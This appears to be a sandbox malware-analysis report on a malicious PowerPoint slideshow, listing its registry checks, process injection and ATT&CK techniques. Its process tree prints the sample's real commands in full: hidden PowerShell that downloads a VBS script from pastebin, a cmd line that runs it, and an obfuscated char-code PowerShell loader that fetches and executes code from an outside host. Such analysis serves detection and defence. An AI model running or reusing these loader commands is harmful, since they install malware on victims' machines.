232f5aeb67a605446b4876aa000e202aeb2cc6bfea17d9156a1b18ccae3a4a00

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	pastebin.com
22	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2736	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
864	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1244	powershell.exe
1244	powershell.exe
2856	Powershell.exe
2856	Powershell.exe
2856	Powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1244	powershell.exe
Token: SeDebugPrivilege	2856	Powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
864	POWERPNT.EXE
864	POWERPNT.EXE

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 864 wrote to memory of 1244	864	POWERPNT.EXE	85
PID 864 wrote to memory of 1244	864	POWERPNT.EXE	85
PID 864 wrote to memory of 1412	864	POWERPNT.EXE	87
PID 864 wrote to memory of 1412	864	POWERPNT.EXE	87
PID 1412 wrote to memory of 2736	1412	cmd.exe	90
PID 1412 wrote to memory of 2736	1412	cmd.exe	90
PID 1412 wrote to memory of 4740	1412	cmd.exe	102
PID 1412 wrote to memory of 4740	1412	cmd.exe	102

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\745db86a63082c422777fb646723ab1d_JaffaCakes118.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/DG0EBdFy','C:\Users\Public\AdobePDF.vbs')
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1244
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AdobePDF.vbs
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - Runs ping.exe
    PID:2736
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Public\AdobePDF.vbs"
    3⤵
    PID:4740

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell $LOLO=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,103,114,105,116,111,100,111,112,111,118,111,46,99,111,109,46,98,114,47,82,117,109,112,101,84,97,114,101,102,97,46,106,112,103,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,103,114,105,116,111,100,111,112,111,118,111,46,99,111,109,46,98,114,47,109,111,100,117,108,101,48,49,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,46,46,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,82,101,103,65,115,109,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($LOLO)|IEX
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856

C:\Windows\system32\cmd.exe
cmd /c copy "C:\Users\Public\AdobePDF.vbs" "C:\Users\Admin\AppData\Roaming" /Y
1⤵
- Process spawned unexpected child process
PID:1320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

4

Remote System Discovery

T1018

System Information Discovery

4

Lateral Movement

Collection

Command and Control

Web Service